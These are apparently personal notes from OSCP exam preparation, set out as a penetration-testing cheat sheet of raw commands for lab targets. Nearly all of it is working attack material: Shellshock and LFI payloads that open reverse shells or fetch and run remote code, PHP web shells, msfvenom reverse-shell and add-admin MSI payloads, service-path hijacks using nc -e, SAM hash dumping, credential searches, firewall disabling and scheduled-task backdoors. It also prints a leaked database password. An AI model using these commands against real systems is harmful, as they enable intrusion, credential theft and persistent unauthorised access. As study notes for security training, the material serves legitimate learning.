OSCP Notes

This file conains all the notes i did during my preparation for the OSCP exam.
=================

START FTPD: /etc/init.d/vsftpd start

make dirtycow stable
echo 0 > /proc/sys/vm/dirty_writeback_centisecs

SHELLSHOCK
==========

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -i >& /dev/tcp/10.11.0.112/443 0>&1 " http://10.11.1.71:80/cgi-bin/admin.cgi

nmap 10.11.1.71 -p 80 \
–script=http-shellshock \
–script-args uri=/cgi-bin/test.cgi –script-args uri=/cgi-bin/admin.cgi

./shocker.py -H TARGET –command “/bin/cat /etc/passwd” -c /cgi-bin/status –verbose

* Shellshock via SSH
ssh -vvv
ssh -i noob noob@$ip ‘() { :;}; /bin/bash’

* cat file (view file contents)

echo -e “HEAD /cgi-bin/status HTTP/1.1\\r\\nUser-Agent: () {:;}; echo \\$(</etc/passwd)\\r\\nHost:vulnerable\\r\\nConnection: close\\r\\n\\r\\n” | nc TARGET 80

curl -H “User-Agent: () { ignored;};/bin/bash -i >& /dev/tcp/192.168.178.102/9999 0>&1” “http://192.168.178.121:80/cgi-bin/status/”

* Shellshock run bind shell using netcat

echo -e “HEAD /cgi-bin/status HTTP/1.1\\r\\nUser-Agent: () {:;}; /usr/bin/nc -l -p 9999 -e /bin/sh\\r\\nHost:vulnerable\\r\\nConnection: close\\r\\n\\r\\n” | nc TARGET 80

FTP BOUNCE
==========
-> use ftp bounce attack on 10.11.1.125A to scan ports on 10.11.1.125B
nmap -vvvv -P0 -n -b 10.11.1.125A 10.11.1.125B -p-

Portscan Netcat
===============
nc -nvv -w 1 -z $ip 3388-3390

Temporary Web Server
===================
python -m SimpleHTTPServer
python3 -m http.server
ruby -rwebrick -e “WEBrick::HTTPServer.new(:Port => 8888, :DocumentRoot => Dir.pwd).start”
php -S 0.0.0.0:8888

WEB ENUMERATION
============
* URL Enumeration
gobuster -u http://10.11.1.71/ \
-w /usr/share/seclists/Discovery/Web_Content/common.txt \
-s ‘200,204,301,302,307,403,500’ -e

-s string
Positive status codes (dir mode only) (default “200,204,301,302,307)
if every non existing ULR gives 200 “Try again you N000b”
remove 200 from -s

-x for file-extension
-x asp

gobuster -u http://10.11.1.71/ -w /usr/share/seclists/Discovery/Web_Content/cgis.txt -s ‘200,204,301,302,307,403,500’ -e

uniscan -qweds -u <http://vm/>

REVERSE SHELL
=============
* Shellshock
curl -H “User-Agent: () { :; }; /bin/bash -c ‘echo aaaa; bash -i >& /dev/tcp/10.11.0.192/443 0>&1; echo zzzz;'” http://10.11.1.71/cgi-bin/admin.cgi -s | sed -n ‘/aaaa/{:a;n;/zzzz/b;p;ba}’

METASPLOIT
==========
* start up postgresql
systemctl start postgresql
* start up msfdb
msfdb start
* start up msf
msfconsole -q
msf > db_status
[ *] postgresql connected to msf
msf >

searchsploit drupal
searchsploit -x filepath

copy to clipboard the exploit:
searchsploit -p filepath

meterpreter reverse shell
set payload windows/meterpreter/reverse_tcp

PHP Exploitton through LFI
==========================
* Check for LFI Linux:
https://www.exploit-db.com/exploits/25971
http://10.11.1.116/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../..//var/log/httpd-error.log

http://10.11.1.116/administrator/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php

Apache Log Poisoning through LFI

jon –show unshadow.txt

=> decodes too:
<?php
class Configuration{
public $host = “localhost”;
public $db = “cuppa”;
public $user = “root”;
public $password = “99bbVDdorGzfZJun”;
public $table_prefix = “cu_”;
public $administrator_template = “default”;
public $list_limit = 25;
public $token = “OBqIPqlFWf3X”;
public $allowed_extensions = “*.bmp; *.csv; *.doc; *.gif; *.ico; *.jpg; *.jpeg; *.odg; *.odp; *.ods; *.odt; *.pdf; *.png; *.ppt; *.swf; *.txt; *.xcf; *.xls; *.docx; *.xlsx”;
public $upload_default_path = “media/uploadsFiles”;
public $maximum_file_size = “5242880”;
public $secure_login = 0;
public $secure_login_value = “”;
public $secure_login_redirect = “”;
}
?>
PHP Session Path
/var/tmp/sess_
/tmp/sess_

* Check for LFI Windows:
page=../../../../../../windows/system32/drivers/etc/hosts

cp /opt/powershell/nishang/Shells/Invoke-PowerShellTcp.ps1 shell-9001.ps1
at bottem:
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.0.192 -Port 4444
copy shell-9001 to local web root
<?php system($_REQUEST[‘PleaseSubscribe’]);>
<?php system($_REQUEST[‘cmd’]);>
?PleaseSubscribe=”PowerShell IEX(New-Object Net.WebClient).downloadString(‘http://10.10.0.192/shell-9001.ps1’)”
-> IEX download and execute
on a windows 64 machine eplace powershell with
C:\Windows\SysNative\WindowsPowershell\v1.0\powershell.exe

press CTRL-u for URL code string in burp

– upload to a file this:
-> will download shell to /tmp/ and execute
<?php system(“cd /tmp; /usr/local/bin/wget http://10.11.0.192/shell; chmod +x shell; ./shell”); ?>

=> download php-serverse-shell rev.php and copy to dir where rev.php can executed via LFI
<?php system(“cd /tmp; /usr/local/bin/wget http://10.11.0.192/c99.php; cp c99.php /usr/local/database/c99.php; “); ?>
<?php system(“cd /tmp; /usr/local/bin/wget http://10.11.0.192/rev.php; cp rev.php /usr/local/database/rev.php; “); ?>
<?php system(“cd /tmp; /usr/local/bin/wget http://10.11.0.192/rev.php; php /tmp/rev.php “); ?>
… this is good when u can not cp into the www-root
.. also one only knows www-root-path by LFI

=> put a remote file into web-root/myshell from http://10.11.0.192/shell.txt
<?php function dl($u, $o){$c = file_get_contents($u);file_put_contents($o,$c);}dl(“http://10.11.0.192/shell.txt”,realpath(realpath(dirname(__FILE__))).”/myshell.php”)?>

Nice php oneliners

echo "<?php phpinfo(); ?>" > phpinfo.php

echo "<?php echo shell_exec($_GET['cmd']);?>" cmd.php

Then you can easily pass whatever commands you like:

http://example.com/cmd.php?cmd=id

:

Windows Exploitation through ASP FILE UPLOAD
============================================

root@kali:~/pwk# msfvenom -l payloads | grep windows

* Creating ASP Reverse NetCat shell with msfvenom:

root@kali:~/pwk# msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.112 LPORT=4444 EXITFUNC=thread -f asp --arch x86 --platform win > revshell.asp
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
Final size of asp file: 38282 bytes

and catch it with

C:\Users\jacco>nc -lvp 4444
listening on [any] 4444 ...

* Creating ASP Reverse Meterpreter Shell with msfvenom:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f asp >reverse.asp

* start meterpreter handler in msfconsole to catch ASP Reverse Meterpreter Shell

use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 10.11.0.112
LHOST => 10.11.0.192
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.11.0.112
set LPORT 4444
set ExitOnSession false
exploit -j

msf-> session -i 1

Meterpreter Reverse Shellcode
=============================
msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp -e x86/alpha_mixed LHOST=10.11.0.192 LPORT=4444 -f python > shell.py

Windows Priviledge escalation Cheatset
=======================================
* Determine Service Pack
Window 2008:
systeminfo
OS Version: 6.1.760 N/A Build 7600
OS Version: 6.1.760 Service Pack 1 Build 7600
Hotfix(s): N/A

Windows XP:
type C:\Windows/system32\eula.txt
type C:\Windows\System32\license.rtf

* Hotfixes installed
dir C:\Windows\SoftwareDistribution\Download\*.* /s
type C:\Windows\WindowsUpdate.log

* List all Documents of all Users
dir /b /ad “C:\Documents and Settings\” /s

* get current windows version
type C:/Windows/system32/eula.txt

* current priviledges
whoami /priv Privileges associated with your account
whoami Get current username

* Other logged in Users
qwinsta

* Users on the system
net user

* Groups on the system
net localgroup

* Members of a group
net localgroup “Remote Desktop Users”

* Change password for user Bob
net user Bob *

* Create a user
net user /add [username] [password]
net user /add gamma gamma

* Run cmd.exe as Administrator
runas /savecred /user:administrator cmd

* to Obtain the names of a service.
Syntax: sc query [service name]
Example: sc query wuauserv

sc query state= all

get all non-windows services:
wmic service get name,displayname,pathname,startmode |findstr /i “auto” |findstr /i /v “c:\windows\\” |findstr /i /v “””
-> than check with icacls the permissions of the executeables
-> vulnerable like Everyone:(I)(F)

* Running Tasks
tasklist

* Kill a task
taskkill f /pid 7777
taskkill /f /im “Taskmgr.ex”

* start or stop a service
sc start
sc stop

* run command through smb when user/password is known
smbexec.py THINC/gamma:”mypassword”@10.11.118^C

* snmp configuration
reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s

* UnQuoted Service Paths
wmic service get name,displayname,pathname,startmode 2>nul |findstr /i “Auto” 2>nul |findstr /i /v “C:\Windows\\” 2>nul |findstr /i /v “””

* Permissions
icacls “C:\Example” Print permissions for “Example” directory
accesschk.exe -qwsu “Group” Objects modifyable by “Group” (try “Everyone”, “Authenticated Users”, and/or “Users”)

accesschk.exe -qwsu “Group” Objects modifyable by “Group” (try “Everyone”, “Authenticated Users”, and/or “Users”)

* Find all weak folder permissions per drive.

accesschk.exe -uwdqs Users c:\
accesschk.exe -uwdqs “Authenticated Users” c:\
accesschk64.exe -uwdqs Users c:\*.*

* Find all weak file permissions per drive.

accesschk.exe -uwqs Users c:\*.*
accesschk.exe -uwqs “Authenticated Users” c:\*.*
accesschk64.exe -uwqs Users c:\*.*
accesschk64.exe -uwqs “Authenticated Users” c:\*.*

* Permissions to services
accesschk.exe -ucqv *
accesschk64.exe -ucqv *
accesschk.exe -cuwv “user” *

accesschk.exe -uwcqv “Authenticated Users” * /accepteula
SERVICE_ALL_ACCESS means we have full control over modifying the properties of the PFNet Service

Find weak service:
C:\Users\Public\ccesschk.exe -cuwv “user” *
Start Type is AUTO_START
sc cong blackwinterSrv binpath= “C:\temp_dir\nc.exe -nv 192.168.168.168 443 -e C:\WINDOWS\System32\cmd.exe”

* To see all global objects that Everyone can modify:

accesschk -wuo everyone \basednamedobjects
accesschk64 -wuo everyone \basednamedobjects

* See system log
wevtutil cl System

* XP: add user to adminustayorf group
net localgroup Administrators Bob /add

* find scheduled tasks
schtasks /query /fo LIST /v
Scheduled Tasks
Here we are looking for tasks that are run by a privileged user, and run a binary that we can overwrite.
schtasks /query /fo LIST /v
This might produce a huge amount of text. I have not been able to figure out how to just output the relevant strings with findstr. So if you know a better way please notify me. As for now I just copy-paste the text and past it into my linux-terminal.
Yeah I know this ain’t pretty, but it works. You can of course change the name SYSTEM to another privileged user.
cat schtask.txt | grep “SYSTEM\|Task To Run” | grep -B 1 SYSTEM

Task scheduled to run when RDP login fails:
SchTasks /Create /RU SYSTEM /SC ONEVENT /MO “*[System[EventID=4625]] and *[EventData[Data=’USERNAME_BACKDOOR’]]” /EC Security /TN “RDPBackdoor” /TR “C:\PAYLOAD.EXE” /F

schtasks /create /tn “SystemTask” /tr “cmd /C ‘PAYLOAD.EXE'” /rl HIGHEST /ru SYSTEM /sc ONSTART
/tn specifies the name of the task
/tr specifies the command to run
/rl specifies run level. I don’t think this is related to Unix run levels, but is instead a privilege thing
/ru the user the payload is run under.
/sc is the frequency. we want it to run when the machine starts up.

* list all servics
sc query

* As Admin, create a user that is allowed to use Rdesktop
net user /add gamma gamma
net localgroup “Remote Desktop Users” gamma /add
net localgroup Administrators gamma /add
net localgroup “Backup Operators” gamma /add

* Search for interesting files
dir sysprep.inf /s
dir sysprep.xml /s
dir Unattended.xml /s
dir *.zip /s
dir *.7z /s
findstr /si pass *.xml *.ini *.txt *.config *.cfg *.bat
findstr /si pwd *.xml *.ini *.txt *.config *.cfg *.bat
dir /s *pass* == *cred* == *vnc* == *.config*
dir C:\*vnc.ini /s /b /c
dir C:\ /s /b /c | findstr /sr \*password\*
dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul
findstr /si password *.xml *.ini *.txt *.config 2>nul

* Query registry
reg query HKLM /f password /t REG_SZ /s
reg query HKLM /f pass /t REG_SZ /s
reg query HKLM /f pwd /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

* Check Credential Store for saved/chached Passwords
cmdkey.exe /list
runas /profile /savecred /user:Administrator <full path of executeable>

dir C:\Users\username\AppData\Local\Microsoft\Credentials\
dir C:\Users\username\AppData\Roaming\Microsoft\Credentials\

* Check if InstallAlwaysElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

msfvemom -f msi -p windows/meterpreter/reverse_tcp
msfvenom -p windows/adduser USER=rottenadmin PASS=xxx -f msi -o rotten.msi
msiexec /quiet /qn /i C:\Users\Steve.INFERNO\Downloads\rotten.msi

vulnerable if following output:
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer
AlwaysInstallElevated REG_DWORD 0x1
A malicious .msi file can be created using msfvenom. Choose a desired payload and set use the -f msi flag to set the output format to MSI.

Then the payload can be executed on the vulnerable system using msiexec.

* Check for Unattended install

dir C:\Windows\Panther\
dir C:\Windows\Panther\Unattend\
dir C:\Windows\System32\
dir C:\Windows\System32\sysprep\
dir c:\Unattended.xml /s
dir c:\sysprep.xml /s
dir c:\sysprep.inf /s

* DLL Highjacking

* PowerSploit

* Unquoted Service Path

wmic service get name,displayname,pathname,startmode |findstr /i “auto” |findstr /i /v “c:\windows\\” |findstr /i /v “””

The path for PFNet’s service binary is unquoted and contains spaces.

Metasploit Module: exploit/windows/local/trusted_service_path

* Unattented Installs

Well, That Escalated Quickly…


-> installations without user interactions containing credentials:

dir c:\Unattend.xml /s
dir c:\sysprep.xml /s
dir c:\sysprep.inf /s

* VNC Password location
RealVNC
HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\vncserver
Value: Password

Cracking:
root@kali:~/scripts/bruteforce# ./vncpwd/vncpwd /root/vnc_pwd

TightVNC
C:\>reg query HKEY_LOCAL_MACHINE\Software\TightVNC\Server /v Password

HKEY_LOCAL_MACHINE\Software\TightVNC\Server
Password REG_BINARY 2151D3722874AD0C

HKEY_CURRENT_USER\Software\TightVNC\Server
Value: Password or PasswordViewOnly
TigerVNC
HKEY_LOCAL_USER\Software\TigerVNC\WinVNC4
Value: Password
UltraVNC
C:\Program Files\UltraVNC\ultravnc.ini
Value: passwd or passwd2
Read More: https://www.raymond.cc/blog/crack-or-decrypt-vnc-server-encrypted-password/

* Basic Commands
systeminfo | findstr /B /C:”OS Name” /C:”OS Version”
hostname
echo %username%
net users
net user user1

* Windows Firewall
Show Config: netsh firewall show config
allow port 3389: netsh firewall add portopening protocol=TCP name=3389 port=3389 mode=ENABLE
Turn Off:
$ netsh firewall set opmode disable
netsh advfirewall set currentprofile state off

* Enable RDP
Enabling RDP
netsh firewall set service RemoteDesktop enable
reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurentControlSet\Control\Terminal Server” /v fDenyTSConnections /t
REG_DWORD /d 0 /f
reg add “hklm\system\currentControlSet\Control\Terminal Server” /v “AllowTSConnections” /t REG_DWORD /d 0x1 /f
sc config TermService start= auto
net start Termservice
netsh.exe
firewall
add portopening TCP 3389 “Remote Desktop”
OR:
netsh.exe advfirewall firewall add rule name=”Remote Desktop – User Mode (TCP-In)” dir=in action=allow
program=”%%SystemRoot%%\system32\svchost.exe” service=”TermService” description=”Inbound rule for the
Remote Desktop service to allow RDP traffic. [TCP 3389] added by LogicDaemon’s script” enable=yes
profile=private,domain localport=3389 protocol=tcp
netsh.exe advfirewall firewall add rule name=”Remote Desktop – User Mode (UDP-In)” dir=in action=allow
program=”%%SystemRoot%%\system32\svchost.exe” service=”TermService” description=”Inbound rule for the
Remote Desktop service to allow RDP traffic. [UDP 3389] added by LogicDaemon’s script” enable=yes
profile=private,domain localport=3389 protocol=udp
OR (meterpreter)
run post/windows/manage/enable_rdp


* Enable RDP access

reg add “hklm\system\currentcontrolset\control\terminal server” /f /v fDenyTSConnections /t REG_DWORD /d 0
netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable

* Neighbours
ipconfig /displaydns Shows DNS cache
netsh route print Print routing table

* WinXP dump hahes
reg.exe save HKLM\SAM sam
reg.exe save HKLM\SYSTEM sys
samdump2 sys sam

reg.exe save hklm\system c:\temp\system.save
secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

* view registry / ntuser.dat
fred

* upload files via ftp: (must be anon axxs)
echo open 10.11.0.192 > ftp.txt
@echo ftp>> ftp.txt
@echo ftp>> ftp.txt
@echo binary>> ftp.txt
@echo GET /nc.exe>> ftp.txt
echo quit >>ftp.txt
ftp -s:ftp.txt -v

* Download from HTTP via Powershell one-liner
(New-Object System.Net.WebClient).DownloadFile(“http://host/file”,”C:\LocalPath”) PowerShell one-liner download a remote file to LocalPath

Invoke-WebRequest “https://myserver/filename” -OutFile “C:\Windows\Temp\filename”
(New-Object System.Net.WebClient).DownloadFile(“https://myserver/filename”, “C:\Windows\Temp\filename”)

echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = “http://10.11.0.192/MS11-040.exe” >>wget.ps1
echo $file = “output-file.exe” >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

$secpasswd = ConvertTo-SecureString “aliceishere” -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential (“alice”, $secpasswd)
$computer = “10.11.1.49”
[System.Diagnostics.Process]::Start(“C:\Users\Public\nc”,”-e c:\windows\system32\cmd.exe 10.11.0.192 9999″, $mycreds.Username, mycreds.Password, $computer)

powershell.exe -ExecutionPolicy Bypass -NoLogo -NoProfile -File wget.ps1

* windows wget alternative
echo Set args = Wscript.Arguments >> webdl.vbs
timeout 1
echo Url = “http://1.1.1.1/windows-privesc-check2.exe” >> webdl.vbs
timeout 1
echo dim xHttp: Set xHttp = createobject(“Microsoft.XMLHTTP”) >> webdl.vbs
timeout 1
echo dim bStrm: Set bStrm = createobject(“Adodb.Stream”) >> webdl.vbs
timeout 1
echo xHttp.Open “GET”, Url, False >> webdl.vbs
timeout 1
echo xHttp.Send >> webdl.vbs
timeout 1
echo with bStrm >> webdl.vbs
timeout 1
echo .type = 1 ‘ >> webdl.vbs
timeout 1
echo .open >> webdl.vbs
timeout 1
echo .write xHttp.responseBody >> webdl.vbs
timeout 1
echo .savetofile “C:\temp\windows-privesc-check2.exe”, 2 ‘ >> webdl.vbs
timeout 1
echo end with >> webdl.vbs
timeout 1
echo

The file can be run using the following syntax:

C:\temp\cscript.exe webdl.vbs

* Transfer via SMB
python /usr/local/bin/smbserver.py ROPNOP /oscp/exploit/windows/ms11-046/
impacket-smbserver ROPNOP /oscp/exploit/windows/ms11-046/
copy \\10.11.0.192\ROPNOP\MS11-040.exe
\\10.11.0.192\ROPNOP\MS11-040.exe

* Transfer via Webdav
/root/webdav_start.sh
net use x: http://10.11.0.192/

* Transfer via Certutil
certutil.exe -URL http://10.11.0.192/foobar
foobar is in C:\Users\subTee\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content

* tunnel only local reachable ports
plink.exe -v -pw mypassword gamma@10.11.0.192 -L 6666:127.0.0.1:445

Wir bauen einen SSH Tunnel um den MySQL zu erreichen.
Wir müssen also über SSH einen Tunnel für Port 3306 schaffen. Dazu bauen wir eine SSH Verbindung zu 1.2.3.4 auf und Tunneln Port 3306.

plink.exe -v -pw geheim nutzername@1.2.3.4 -L 6603:localhost:3306

* Compiling C windows exploits on Linux

wget -q -O – https://archive.kali.org/archive-key.asc | apt-key add
apt-get install mingw-w64 -y
note, you can add 32bit architecture using the following line.
Code:
dpkg –add-architecture i386
apt-get update
you can check your architecture with following command lines:
Code:
dpkg –print-architecture
dpkg –print-foreign-architectures

#64 bit > i686-w64-mingw32-gcc exploit.c -o exploit
#32 bit > i686-w64-mingw32-gcc 40564.c -o 40564 -lws2_32
root@kali# wine exploit.exe

* Windows LOOTING
https://tools.kali.org/password-attacks/creddump

* Run Powershell scripts
MS16-032 https://www.exploit-db.com/exploits/39719/

powershell -ExecutionPolicy ByPass -command “& { . C:\Users\Public\Invoke-MS16-032.ps1; Invoke-MS16-032 }”

powershell -ExecutionPolicy ByPass -command “& { . C:\Users\Bethany\AppData\Local\Temp\Invoke-MS16-032.ps1; Invoke-MS16-032 }”

* Windows compile python to .exe
net use z: \\tsclient\test

code in /root/rdesktopshare

C:\Users\Administrator\Desktop\Tools\python\pyinstaller-2.1\pyInstaller-2.1
C:\Users\Administrator\Desktop\Tools\python\pyinstaller-2.1\pyInstaller-2.1>c:\Python27\python.exe pyinstaller.py –onefile z:\ms14-058.py

wine ~/.wine/drive_c/Python27/Scripts/pyinstaller.exe –onefile HelloWorld.py

* Powershell RunAS

working:
echo $username = ‘ftp’ > runas.ps1
echo $securePassword = ConvertTo-SecureString “foobar23” -AsPlainText -Force >> runas.ps1
echo $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword >> runas.ps1
echo $script = ‘c:\windows\system32\cmd.exe’ >> runas.ps1
echo Start-Process -WorkingDirectory ‘C:\Windows\System32’ -FilePath $script -Credential $credential >> runas.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File runas.ps1

* Powershell reverse Netcat shell in C:\Users\Public\nc.exe with user ftp/foobar23

echo $username = ‘ftp’ > rev.ps1
echo $securePassword = ConvertTo-SecureString “foobar23” -AsPlainText -Force >> rev.ps1
echo $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword >> rev.ps1
echo $script= ‘C:\Users\Public\nc.exe’ >> rev.ps1
echo Start-Process -WorkingDirectory ‘C:\Users\Public\’ -FilePath $script -ArgumentList ‘-e cmd.exe 10.11.0.192 9999’ -Credential $credential >> rev.ps1

echo $username = ‘alice’ > runas.ps1
echo $securePassword = ConvertTo-SecureString “aliceishere” -AsPlainText -Force >> runas.ps1
echo $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword >> runas.ps1
echo Start-Process C:\Windows\System32\cmd.exe -Credential $credential >> runas.ps1

Using Powershell to RunAs an administrative user:
echo $secpasswd = ConvertTo-SecureString “password” -AsPlainText -Force > run.ps1
echo $mycreds = New-Object System.Management.Automation.PSCredential (“admin”, $secpasswd) >> run.ps1
echo $computer = “DANCING-PARROT” >> run.ps1
echo [System.Diagnostics.Process]::Start(“C:\xampp\webdav\rev.exe”,””, >> run.ps1
echo $mycreds.Username, $mycreds.Password, $computer) >> run.ps1
powershell -ExecutionPolicy Bypass -File run.ps1

echo $username = ‘alice‘ > startprocess.ps1
echo $password = ‘aliceishere‘ >> startprocess.ps1
echo $securePassword = ConvertTo-SecureString $password -AsPlainText -Force >> startprocess.ps1
echo $credential = New-Object System.Management.Automation.PSCredential $username, $securepassword >> startprocess.ps1
echo Start-Process ‘C:\Users\Public\nc.exe’ -ArgumentList ‘-e cmd.exe 10.11.0.192 9999’ -Credential $credential >> startprocess.ps1

* Windows helpers

useradd.c

* Windows – Add user.

#include <stdlib.h> /* system, NULL, EXIT_FAILURE */

int main ()
{
int i;
i=system (“net user <username> <password> /add && net localgroup administrators <username> /add”);
return 0;
}

# Compile
i686-w64-mingw32-gcc -o useradd.exe useradd.c
SUID

* Set owner user ID.

int main(void){
setresuid(0, 0, 0);
system(“/bin/bash”);
}

# Compile
gcc suid.c -o suid
Powershell Run as

* Run file as another user with powershell.

echo $username = ‘<username>’ > runas.ps1
echo $securePassword = ConvertTo-SecureString “<password>” -AsPlainText -Force >> runas.ps1
echo $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword >> runas.ps1
echo Start-Process C:\Users\User\AppData\Local\Temp\backdoor.exe -Credential $credential >> runas.ps1
Process Monitor

* Monitor processes to check for running cron jobs.

#!/bin/bash

# Loop by line
IFS=$’\n’

old_process=$(ps -eo command)

while true; do
new_process=$(ps -eo command)
diff <(echo “$old_process”) <(echo “$new_process”) | grep [\<\>]
sleep 1
old_process=$new_process
done

* Powershell Empire
in empire:
listeners
uselistener http
set Host http://10.10.14.30:443
set Port 443
execute
launcher powershell
copy output to a file empire.ps1 serving on local apache

in burp:
.. downloadString(‘…/empire.ps1

in empire:
interact agentid
searchmode PowerUp
usermodule privesc/powerup/allchecks
info
execute

* PowerUp.ps1
add the end: Invoke-AllChecks

when having code execution via .asp/.php/…
?fexec = echo “IEX(New-Object Net.WebClient).DownloadString(‘http://myip/PowerUp.ps’) | powershell -noprofile –

* Sherlock
Sherlock.ps1
grep -i function Sherlock.ps1
Find-AllVulns
at the end append: Find-AllVulns

* Check if OS is 64bit
Powershell.exe
[environment]::Is64BitOperatingSystem

* Check if current process is a 64bit Process
[environment]::Is64BitProcess

Directories
SysWOW64 64bit Applictions available to 32bit Applications through emulation
SysNative -> 64bit processes live here

* when running 32bit app on a 64bit OS
Powershell.exe -> C:\Windows\SysNative\WindowsPowerShell\v1.0\Powershell

WIN XP SP0/SP1 local priviledge escalation
================================
sc config upnphost binpath= “C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe”

sc config upnphost obj= “.\LocalSystem” password= “”
sc qc upnphost
nc -lvp 9988
net start upnphost

#list properties
sc qc “Vulnerable Service”
# check privileges
sc qprivs “Service name”

net user /add gamma gamma
sc config upnphost binpath= “C:\Inetpub\wwwroot\nc.exe 192.168.1.101 6666 -e c:\Windows\system32\cmd.exe”
sc config upnphost binpath= “C:\Inetpub\wwwroot\nc.exe 10.11.0.192 6666 -e C:\WINDOWS\System32\cmd.exe”
sc config upnphost obj= “.\LocalSystem” password= “”
sc config upnphost depend= “”

LINUX PRIVILEDGE ESCALATION
===========================

* What files run as root / SUID / GUID?:

find / -perm +2000 -user root -type f -print
find / -perm -1000 -type d 2>/dev/null # Sticky bit – Only the owner of the directory or the owner of a file can delete or rename here.
find / -perm -g=s -type f 2>/dev/null # SGID (chmod 2000) – run as the group, not the user who started it.
find / -perm -u=s -type f 2>/dev/null # SUID (chmod 4000) – run as the owner, not the user who started it.
find / -perm -g=s -o -perm -u=s -type f 2>/dev/null # SGID or SUID

for i in `locate -r “bin$”`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done

find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null

* What folders are world writeable?:

find / -writable -type d 2>/dev/null # world-writeable folders
find / -perm -222 -type d 2>/dev/null # world-writeable folders
find / -perm -o w -type d 2>/dev/null # world-writeable folders
find / -perm -o x -type d 2>/dev/null # world-executable folders
find / \( -perm -o w -perm -o x \) -type d 2>/dev/null # world-writeable & executable folders

SHELL SPAWNING
==============
python -c ‘import pty; pty.spawn(“/bin/sh”)’
CTRL-Z
stty raw -echo
fg
stty size
stty -rows 48 -columns 120

echo os.system(‘/bin/bash’)
/bin/sh -i
perl —e ‘exec “/bin/sh”;’
perl: exec “/bin/sh”;
ruby: exec “/bin/sh”
lua: os.execute(‘/bin/sh’)
(From within IRB)
exec “/bin/sh”
(From within vi)
:!bash
(From within vi)
:set shell=/bin/bash:shell
(From within nmap)
!sh
(from man page)
!/bin/sh

Spawning a shell directly

The system you’re in might not have Python or Perl, but that doesn’t mean you won’t get a shell. You can try simply calling the shell directly from your session:

$ /bin/sh -i

Reverse shells

Interesting Fils for Dirbuster Bruteforcing:
==============
mbox.bz2
mbox

WWW Directory enumeration
————————–
dirb http://10.11.1.72 /usr/share/wordlists/dirb/small.txt -x extensions_common.txt

based on Web Application:
/usr/share/seclists/Discovery/Web-Content

Windows SMB enumeration
———————–
* enum4linux -a <host~

* ms08-67
nmap -sU -sS –script smb-vuln-ms08-067.nse -p U:137,T:139 10.11.1.5

* os detection
nmap -v -p 139, 445 –script=smb-os-discovery 10.11.1.227

* smb security mode
nmap -v -p 139, 445 –script=smb-security-mode 10.11.1.236

* some checks
nmap -vvv -sU -sS –script smb-enum-users,smb-enum-shares,smb-os-discovery,smb-protocols,smb-security-mode,smb-system-info,smb2-capabilities,smb2-security-mode,smb-vuln-ms08-067,smb-vuln-ms10-054,smb-vuln-ms10-061 –script-args=unsafe=1 -p U:1^C,T:139 10.11.1.5

SMB Enumeration

SMB OS Discovery
nmap $ip –script smb-os-discovery.nse

Nmap port scan
nmap -v -p 139,445 -oG smb.txt $ip-254

Netbios Information Scanning
nbtscan -r $ip/24

Nmap find exposed Netbios servers
nmap -sU –script nbstat.nse -p 137 $ip

Nmap all SMB scripts scan

nmap -sV -Pn -vv -p 445 –script='(smb*) and not (brute or broadcast or dos or external or fuzzer)’ –script-args=unsafe=1 $ip

Nmap all SMB scripts authenticated scan

nmap -sV -Pn -vv -p 445 –script-args smbuser=<username>,smbpass=<password> –script='(smb*) and not (brute or broadcast or dos or external or fuzzer)’ –script-args=unsafe=1 $ip

SMB Enumeration Tools
nmblookup -A $ip

smbclient //MOUNT/share -I $ip -N

rpcclient -U “” $ip

enum4linux $ip

enum4linux -a $ip

SMB Finger Printing
smbclient -L //$ip

Nmap Scan for Open SMB Shares
nmap -T4 -v -oA shares –script smb-enum-shares –script-args smbuser=username,smbpass=password -p445 192.168.10.0/24

Nmap scans for vulnerable SMB Servers
nmap -v -p 445 –script=smb-check-vulns –script-args=unsafe=1 $ip

Nmap List all SMB scripts installed
ls -l /usr/share/nmap/scripts/smb*

Enumerate SMB Users

nmap -sU -sS –script=smb-enum-users -p U:137,T:139 $ip-14

OR

python /usr/share/doc/python-impacket-doc/examples /samrdump.py $ip

RID Cycling – Null Sessions
ridenum.py $ip 500 50000 dict.txt

Manual Null Session Testing

Windows: net use \\$ip\IPC$ “” /u:””

Linux: smbclient -L //$ip

Port Scan
==========

